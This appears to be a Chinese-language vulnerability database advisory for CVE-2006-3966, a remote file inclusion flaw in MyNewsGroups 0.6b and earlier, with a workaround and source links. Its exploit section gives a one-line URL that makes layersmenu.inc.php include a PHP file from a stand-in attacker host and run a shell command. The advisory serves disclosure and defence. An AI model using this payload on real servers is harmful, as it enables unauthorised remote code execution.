添加时间:
2008-10-03

系统编号:
WAVDB-01007
BugCVE: CVE-2006-3966
BUGTRAQ: 19258

影响版本:
MyNewsGroups <= 0.6b

程序介绍:

MyNewsGroups是具有WEB界面的USENET新闻组客户端。

漏洞分析:

MyNewsGroups的lib/tree/layersmenu.inc.php文件中没有正确的过滤对myng_root参数的输入，允许攻击者可以通过包含本地或外部资源执行任意PHP代码。
漏洞相关的代码如下：

漏洞利用:

http://[target]/lib/tree/layersmenu.inc.php?myng_root=http://evilsite.com/PEAR.php/&cmd=ls

解决方案:
临时解决方法：
如果您不能立刻安装补丁或者升级，建议您采取以下措施以降低威胁：
* 向php-file添加以下一行：
$myng_root ="bla/bla" //Your root path

厂商补丁：
MyNewsGroups
------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://mynewsgroups.sourceforge.net/

信息来源:
<*来源：Philipp Niedziela （webmaster@bb-pcsecurity.de）
链接：http://www.bb-pcsecurity.de/sicherheit_266.txt
http://secunia.com/advisories/21263/print/
*>